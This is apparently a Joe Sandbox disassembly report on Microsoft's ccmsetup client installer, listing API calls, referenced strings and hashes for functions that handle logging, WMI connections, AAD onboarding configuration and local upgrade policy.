                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062024B
                                                                                            • Part of subcall function 006038EF: __EH_prolog3_catch.LIBCMT ref: 006038F6
                                                                                            • Part of subcall function 006038EF: GetCurrentThreadId.KERNEL32 ref: 00603953
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006202C3
                                                                                          Strings
                                                                                          • Failed to create instance of MDM_ConfigSetting. Error 0x%x, xrefs: 00620102
                                                                                          • spObject.SetString(c_szCoMgmt_SettingValue, sSettingValue.c_str()), xrefs: 00620241
                                                                                          • spObject.SetString(c_szCoMgmt_SettingName, sSettingName.c_str()), xrefs: 006201C2
                                                                                          • Failed to SetString for SettingName. Error 0x%x, xrefs: 006201F7
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 006200D9
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 006201D4
                                                                                          • root\cimv2\mdm, xrefs: 0061FFBF
                                                                                          • spNamespace.Open(c_szMdmNamespace), xrefs: 0061FFED
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00620246
                                                                                          • SettingName, xrefs: 00620194
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0061FFFF
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0062023B
                                                                                          • Failed to PutInstance. Error 0x%x, xrefs: 006202F4
                                                                                          • Failed to get MDM_ConfigSetting instance, 0x%x, xrefs: 0062017B
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006202BE
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 006202CB
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0062012B
                                                                                          • CcmUtilLib::SetPropertyToMDMConfigSetting, xrefs: 0061FEF7
                                                                                          • MDM_ConfigSetting, xrefs: 00620095
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006201C7
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 00620143
                                                                                          • OS is not Win10RS3+, ENDOK., xrefs: 0061FF8E
                                                                                          • spNamespace.PutInstance(spObject), xrefs: 006202B9
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 006200C1
                                                                                          • Failed to SetString for SettingValue. Error 0x%x, xrefs: 0062027C
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0061FFF2
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 006202B3
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 00620253
                                                                                          • Updating MDM_ConfigSetting.%s with value %s, xrefs: 0061FF51
                                                                                          • SettingValue, xrefs: 00620213
                                                                                          • MDM_ConfigSetting.SettingName="%s", xrefs: 0062004E
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006200CC
                                                                                          • Failed to open MDM namespace. Error 0x%x, xrefs: 00620028
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 006201BC
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0061FFE7
                                                                                          • spNamespace.CreateInstance(c_szMdmConfigClassName, &spObject), xrefs: 006200C7
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00620136
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$H_prolog3_catchH_prolog3_catch_
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0057AFF7
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005A1CAB: __EH_prolog3_GS.LIBCMT ref: 005A1CB2
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                            • Part of subcall function 005B75A1: __EH_prolog3_catch.LIBCMT ref: 005B75A8
                                                                                            • Part of subcall function 005B75A1: GetCurrentThreadId.KERNEL32 ref: 005B7633
                                                                                            • Part of subcall function 005A162C: __EH_prolog3_GS.LIBCMT ref: 005A1633
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_Thread$H_prolog3H_prolog3_catchH_prolog3_catch_
                                                                                          • String ID: %s: %i$%s: %i$-&$0$@&$CCMCERTID$CCMCERTID: %s$CCMCERTISSUERS$CCMCERTISSUERS: %s$CCMCERTSEL$CCMCERTSEL: %s$CCMCERTSTORE$CCMCERTSTORE: %s$CCMFIRSTCERT$CCMFIRSTCERT: %u$CCMHTTPPORT$CCMHTTPPORT: %u$CCMHTTPSCERTNAME$CCMHTTPSCERTNAME: %s$CCMHTTPSPORT$CCMHTTPSPORT: %u$CCMHTTPSSTATE$CCMHTTPSSTATE: %u$CCMPKICERTOPTIONS$CCMPKICERTOPTIONS: %u$CcmSetup::CalculateParameters$FSP$FSP: %s$Lookup MP: %s$MANAGEDINSTALLER$S&$SMSMP$SMSSLP$SMSSLP: %s$`&$l&$s&$x&$%
                                                                                          • API String ID: 2467020135-563852022
                                                                                          • Opcode ID: 8670351666505cfca9bc8dc4790d0e0574b7e883e1b1b715f97aec5ed6fded17
                                                                                          • Instruction ID: f2fede161c4ea76e4e6307bd7386e4a70808206774b1f96503db3d57162a9348
                                                                                          • Opcode Fuzzy Hash: 8670351666505cfca9bc8dc4790d0e0574b7e883e1b1b715f97aec5ed6fded17
                                                                                          • Instruction Fuzzy Hash: E9828C70900249EEEF11DFA4D98AFEEBFB9BF55300F108099E105A7192DB749A48DF61

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0058D385
                                                                                            • Part of subcall function 005F4253: __EH_prolog3.LIBCMT ref: 005F425A
                                                                                            • Part of subcall function 00605D68: __EH_prolog3_catch_GS.LIBCMT ref: 00605D6F
                                                                                            • Part of subcall function 00605D68: GetCurrentThreadId.KERNEL32 ref: 00605DC2
                                                                                          • GetEnvironmentVariableW.KERNEL32(CcmSetupLogFileName,00000000,00000000,00000001,00000000,00000000,?,?,ccmsetup.log,?,O:BAG:BAD:P(A;CIOI;GA;;;BA)(A;CIOI;GA;;;SY)(A;CIOI;GR;;;IU),?,CcmSetup::InitializeLogging), ref: 0058D455
                                                                                          • GetEnvironmentVariableW.KERNEL32(CcmSetupLogFileName,?,?,00000001), ref: 0058D478
                                                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 0058D4C0
                                                                                          • CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,00000080,00000000,O:BAG:BAD:P(A;CIOI;GA;;;BA)(A;CIOI;GA;;;SY)(A;CIOI;GR;;;IU),00000000), ref: 0058D4FC
                                                                                          • GetLastError.KERNEL32(?,10000000,00000000,00000000,00000002,00000080,00000000,O:BAG:BAD:P(A;CIOI;GA;;;BA)(A;CIOI;GA;;;SY)(A;CIOI;GR;;;IU),00000000), ref: 0058D51D
                                                                                            • Part of subcall function 00607FC3: __EH_prolog3_catch.LIBCMT ref: 00607FCA
                                                                                            • Part of subcall function 00607FC3: GetCurrentThreadId.KERNEL32 ref: 0060802A
                                                                                            • Part of subcall function 00607FC3: LocalFree.KERNEL32(00000000,?,0000000C,00000000,00000001,00000000,00000000,CCM::Utility::Filesystem::Path::CreateEx,00000020,005817C1,?,O:BAG:BAD:P(A;CIOI;GA;;;BA)(A;CIOI;GA;;;SY),?), ref: 0060812F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058D553
                                                                                          • CloseHandle.KERNEL32(000000FF,?,10000000,00000000,00000000,00000002,00000080,00000000,O:BAG:BAD:P(A;CIOI;GA;;;BA)(A;CIOI;GA;;;SY)(A;CIOI;GR;;;IU),00000000), ref: 0058D588
                                                                                            • Part of subcall function 005F2D38: __EH_prolog3_catch.LIBCMT ref: 005F2D3F
                                                                                            • Part of subcall function 005F2D38: GetCurrentThreadId.KERNEL32 ref: 005F2D7F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058D5E1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058D634
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058D67F
                                                                                          • GetCurrentProcessId.KERNEL32(00000001,ccmsetup,00000010,?,?,?,O:BAG:BAD:P(A;CIOI;GA;;;BA)(A;CIOI;GA;;;SY)(A;CIOI;GR;;;IU)), ref: 0058D6B1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: Current$Thread$EnvironmentFileH_prolog3_catchH_prolog3_catch_Variable$AttributesCloseCreateErrorFreeH_prolog3HandleLastLocalProcess
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$==========[ ccmsetup started in process %lu ]==========$CcmSetup::InitializeLogging$CcmSetupLogFileName$Logs\$O:BAG:BAD:P(A;CIOI;GA;;;BA)(A;CIOI;GA;;;SY)(A;CIOI;GR;;;IU)$SetCustomLoggingHandler(&lhi)$SetDefaultComponent(c_szServiceName)$SetObjectSecurity( m_sLogFile, c_szLogsDirectorySecurity )$`)l$ccmsetup$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.log$shLogFile.null() == false$(
                                                                                          • API String ID: 1275211060-2713520664
                                                                                          • Opcode ID: e5f1ea002ce018fb5df80b7fca368d70a500107d9f134e51cc819fa5a6fe37ac
                                                                                          • Instruction ID: 136a995f6880e58ac2098f46a661402c2757fd46836876d0b2704e17b467bfcf
                                                                                          • Opcode Fuzzy Hash: e5f1ea002ce018fb5df80b7fca368d70a500107d9f134e51cc819fa5a6fe37ac
                                                                                          • Instruction Fuzzy Hash: 51A19A71D40248AADF20EBE4C949AEEBFB9BF52704F14801AF541B72C1CB755A05CB62
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00603367
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006033F8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060346C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006035E2
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00603663
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006036B6
                                                                                          Strings
                                                                                          • root\, xrefs: 00603500
                                                                                          • ..\WmiNamespace.cpp, xrefs: 00603653
                                                                                          • ..\WmiNamespace.cpp, xrefs: 00603474
                                                                                          • ..\WmiNamespace.cpp, xrefs: 0060345C
                                                                                          • Failed to open to WMI namespace '%s' (%08lx), xrefs: 00603617
                                                                                          • spLocator.createInstance( ((bUseAdminLocator == true) ? CLSID_WbemAdministrativeLocator : CLSID_WbemLocator ) ), xrefs: 00603462
                                                                                          • \\.\, xrefs: 006034D4
                                                                                          • CCM::Utility::Wmi::Namespace::Open, xrefs: 006033B2
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0060365E
                                                                                          • ..\WmiNamespace.cpp, xrefs: 006035EA
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006033F3
                                                                                          • Could not create WMI locator class (%08lx), xrefs: 00603495
                                                                                          • ..\WmiNamespace.cpp, xrefs: 0060366B
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00603467
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006036B1
                                                                                          • ..\WmiNamespace.cpp, xrefs: 006033E8
                                                                                          • ..\WmiNamespace.cpp, xrefs: 006036A6
                                                                                          • pszNamespace != 0, xrefs: 006033EE
                                                                                          • AllowImpersonation(getPointer()), xrefs: 006036AC
                                                                                          • ..\WmiNamespace.cpp, xrefs: 00603400
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006035DD
                                                                                          • SetNamespacePath(), xrefs: 00603659
                                                                                          • \\.\\, xrefs: 00603539, 0060353E, 00603546
                                                                                          • ^t, xrefs: 0060360B
                                                                                          • ..\WmiNamespace.cpp, xrefs: 006036BE
                                                                                          • ..\WmiNamespace.cpp, xrefs: 006035D2
                                                                                          • root, xrefs: 006034EB
                                                                                          • spLocator->ConnectServer( BString(sNamespace), NULL, NULL, NULL, 0, NULL, pContext, NamespacePtr::operator &() ), xrefs: 006035D8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$AllowImpersonation(getPointer())$CCM::Utility::Wmi::Namespace::Open$Could not create WMI locator class (%08lx)$Failed to open to WMI namespace '%s' (%08lx)$SetNamespacePath()$\\.\$\\.\\$pszNamespace != 0$root$root\$spLocator->ConnectServer( BString(sNamespace), NULL, NULL, NULL, 0, NULL, pContext, NamespacePtr::operator &() )$spLocator.createInstance( ((bUseAdminLocator == true) ? CLSID_WbemAdministrativeLocator : CLSID_WbemLocator ) )$^t
                                                                                          • API String ID: 3353525418-2011712476
                                                                                          • Opcode ID: f5cedb990649f18c75472c8e8096b17930fada72aa42b6c8c3a962c5e75afd0a
                                                                                          • Instruction ID: e40454f867bb4b0816b858ede98c1b497d5834a1ef8a22a23f0591cd8e1d5fda
                                                                                          • Opcode Fuzzy Hash: f5cedb990649f18c75472c8e8096b17930fada72aa42b6c8c3a962c5e75afd0a
                                                                                          • Instruction Fuzzy Hash: C1A1AEB1D80258ABDB11EBA4CC4ABEE7FB9AF55700F148059F5047B3C2D7B85A09CB61
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0062A2F0
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062A38C
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062A3EC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062A43B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062A48D
                                                                                            • Part of subcall function 005F6FE7: __EH_prolog3_catch.LIBCMT ref: 005F6FEE
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062A4FD
                                                                                          Strings
                                                                                          • AADAuthUrl, xrefs: 0062A4A3
                                                                                          • ..\CcmToken.cpp, xrefs: 0062A495
                                                                                          • ..\CcmToken.cpp, xrefs: 0062A394
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062A436
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062A3E7
                                                                                          • regKey.GetString(c_szResourceUri_RegValue, aadInfo.sResourceUri ), xrefs: 0062A483
                                                                                          • SOFTWARE\Microsoft\CCM\AADConfigs, xrefs: 0062A3AB
                                                                                          • ..\CcmToken.cpp, xrefs: 0062A47D
                                                                                          • ..\CcmToken.cpp, xrefs: 0062A3DC
                                                                                          • ClientAppId, xrefs: 0062A3FF
                                                                                          • ..\CcmToken.cpp, xrefs: 0062A4ED
                                                                                          • ..\CcmToken.cpp, xrefs: 0062A42B
                                                                                          • regKey.GetString(c_szClientAppId_RegValue, aadInfo.sClientAppId), xrefs: 0062A431
                                                                                          • ..\CcmToken.cpp, xrefs: 0062A505
                                                                                          • ..\CcmToken.cpp, xrefs: 0062A443
                                                                                          • ResourceUri, xrefs: 0062A451
                                                                                          • ..\CcmToken.cpp, xrefs: 0062A3F4
                                                                                          • !aadInfo.sClientAppId.empty() && !aadInfo.sResourceUri.empty(), xrefs: 0062A4F3
                                                                                          • regKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szAADConfigs_RegKey, ((((0x00020000L)) | (0x0001) | (0x0008) | (0x0010)) , xrefs: 0062A3E2
                                                                                          • impersonator.ImpersonateProcess(), xrefs: 0062A382
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062A387
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062A4F8
                                                                                          • CcmUtilLib::CcmGetAADOnboardingInfo, xrefs: 0062A314
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062A488
                                                                                          • ..\CcmToken.cpp, xrefs: 0062A37C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch$CloseH_prolog3
                                                                                          • String ID: !aadInfo.sClientAppId.empty() && !aadInfo.sResourceUri.empty()$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$AADAuthUrl$CcmUtilLib::CcmGetAADOnboardingInfo$ClientAppId$ResourceUri$SOFTWARE\Microsoft\CCM\AADConfigs$impersonator.ImpersonateProcess()$regKey.GetString(c_szClientAppId_RegValue, aadInfo.sClientAppId)$regKey.GetString(c_szResourceUri_RegValue, aadInfo.sResourceUri )$regKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szAADConfigs_RegKey, ((((0x00020000L)) | (0x0001) | (0x0008) | (0x0010))
                                                                                          • API String ID: 288237175-914748012
                                                                                          • Opcode ID: bfdc655f67580eaf59eff30be829dfb7b4f77827582b2f85fb6acda8c0474610
                                                                                          • Instruction ID: 50a891c9ceccd9eeea9990708f2a3b9420d2799d7a3ec512a2f7436e8dd8b5fd
                                                                                          • Opcode Fuzzy Hash: bfdc655f67580eaf59eff30be829dfb7b4f77827582b2f85fb6acda8c0474610
                                                                                          • Instruction Fuzzy Hash: A3510BB1944665ABCB11EBE5DD0AEFE7F75AF51B00F04404AF900B7382C7B85A05CB92
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005CC123
                                                                                            • Part of subcall function 006013B4: __EH_prolog3.LIBCMT ref: 006013BB
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 00603360: __EH_prolog3_catch_GS.LIBCMT ref: 00603367
                                                                                            • Part of subcall function 00603360: GetCurrentThreadId.KERNEL32 ref: 006033F8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005CC1BC
                                                                                            • Part of subcall function 0060C04D: __EH_prolog3_catch.LIBCMT ref: 0060C054
                                                                                            • Part of subcall function 0060C04D: GetCurrentThreadId.KERNEL32 ref: 0060C0C4
                                                                                            • Part of subcall function 0060C04D: __CxxThrowException@8.LIBCMT ref: 0060C134
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005CC254
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005CC2F1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005CC3CF
                                                                                          Strings
                                                                                          • localpolicy.cpp, xrefs: 005CC2F9
                                                                                          • spNS.DeleteInstance(sPath.c_str()), xrefs: 005CC2E7
                                                                                          • localpolicy.cpp, xrefs: 005CC1AC
                                                                                          • localpolicy.cpp, xrefs: 005CC25C
                                                                                          • Failed to connect to policy namespace. Error 0x%x, xrefs: 005CC1EA
                                                                                          • localpolicy.cpp, xrefs: 005CC2E1
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005CC2EC
                                                                                          • __RELPATH, xrefs: 005CC277
                                                                                          • spNS.DeleteInstance(sPath.c_str()), xrefs: 005CC3C5
                                                                                          • localpolicy.cpp, xrefs: 005CC3BF
                                                                                          • __RELPATH, xrefs: 005CC352
                                                                                          • Failed to delete instance %s. Error 0x%x, xrefs: 005CC409
                                                                                          • Successfully revoked client auto-upgrade local policy., xrefs: 005CC444
                                                                                          • \\.\root\ccm\policy\machine\requestedconfig, xrefs: 005CC184
                                                                                          • Failed to delete instance %s. Error 0x%x, xrefs: 005CC32B
                                                                                          • RevokeLocalUpgradePolicy, xrefs: 005CC161
                                                                                          • localpolicy.cpp, xrefs: 005CC244
                                                                                          • Failed to revoke client upgrade local policy. Error 0x%x, xrefs: 005CC499
                                                                                          • spNS.Open(c_szMachinePolicyNS), xrefs: 005CC1B2
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005CC3CA
                                                                                          • localpolicy.cpp, xrefs: 005CC1C4
                                                                                          • localpolicy.cpp, xrefs: 005CC3D7
                                                                                          • GetPolicyInstances(spNS, spSchedule, spProgram), xrefs: 005CC24A
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005CC24F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005CC1B7
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$H_prolog3_catch_$Exception@8H_prolog3_catchThrow
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$Failed to connect to policy namespace. Error 0x%x$Failed to delete instance %s. Error 0x%x$Failed to delete instance %s. Error 0x%x$Failed to revoke client upgrade local policy. Error 0x%x$GetPolicyInstances(spNS, spSchedule, spProgram)$RevokeLocalUpgradePolicy$Successfully revoked client auto-upgrade local policy.$\\.\root\ccm\policy\machine\requestedconfig$__RELPATH$__RELPATH$localpolicy.cpp$localpolicy.cpp$localpolicy.cpp$localpolicy.cpp$localpolicy.cpp$localpolicy.cpp$localpolicy.cpp$localpolicy.cpp$spNS.DeleteInstance(sPath.c_str())$spNS.DeleteInstance(sPath.c_str())$spNS.Open(c_szMachinePolicyNS)
                                                                                          • API String ID: 1022113445-4169778392
                                                                                          • Opcode ID: 4bd5a179377c031b48c35dd58cd2116d4be098fba399c4bfcb2ea7225cb531ca
                                                                                          • Instruction ID: 5d477feaa615e707b8eab44c26d0a05c4a7528c5ea6671bf3706825c28804465
                                                                                          • Opcode Fuzzy Hash: 4bd5a179377c031b48c35dd58cd2116d4be098fba399c4bfcb2ea7225cb531ca
                                                                                          • Instruction Fuzzy Hash: 74B16B71D4025CEEDB20DBA4CD4AFEEBEB9BF51700F148099E609B7182DB705A48CB61
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005B6952
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetFileVersionInfoSizeW.VERSION(?,?,GetFileVersion,00000030,005A1F79,?,?,00000001,00000000,00000000,?,00000000,00000001,00000001,00000000,00000000), ref: 005B69BE
                                                                                          • GetLastError.KERNEL32(?,?,GetFileVersion,00000030,005A1F79,?,?,00000001,00000000,00000000,?,00000000,00000001,00000001,00000000,00000000), ref: 005B69CA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B69FC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B6A5E
                                                                                          • GetFileVersionInfoW.VERSION(?,?,?,?,00000000,?,?,GetFileVersion,00000030,005A1F79,?,?,00000001,00000000,00000000,?), ref: 005B6A7F
                                                                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,GetFileVersion,00000030,005A1F79,?,?,00000001,00000000,00000000,?), ref: 005B6A88
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B6ABE
                                                                                          • VerQueryValueW.VERSION(?,006DCC80,?,?,?,?,?,?,00000000,?,?,GetFileVersion,00000030,005A1F79,?,?), ref: 005B6AE4
                                                                                          • GetLastError.KERNEL32(?,006DCC80,?,?,?,?,?,?,00000000,?,?,GetFileVersion,00000030,005A1F79,?,?), ref: 005B6AED
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B6B23
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$ErrorLast$FileInfoVersion$H_prolog3H_prolog3_catchQuerySizeValue
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%u.%u.%04u.%04u$(Buffer.resize(uSize) == true) != 0$GetFileVersion$GetFileVersionInfoW( (LPWSTR)sPath.c_str(), uHandle, uSize, Buffer.getBuffer() )$VerQueryValueW( Buffer.getBuffer(), (LPTSTR)L"\\", (LPVOID*)&pFixedFileInfo, &uLength )$t)l$uSize > 0$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp
                                                                                          • API String ID: 1185347379-1815811704
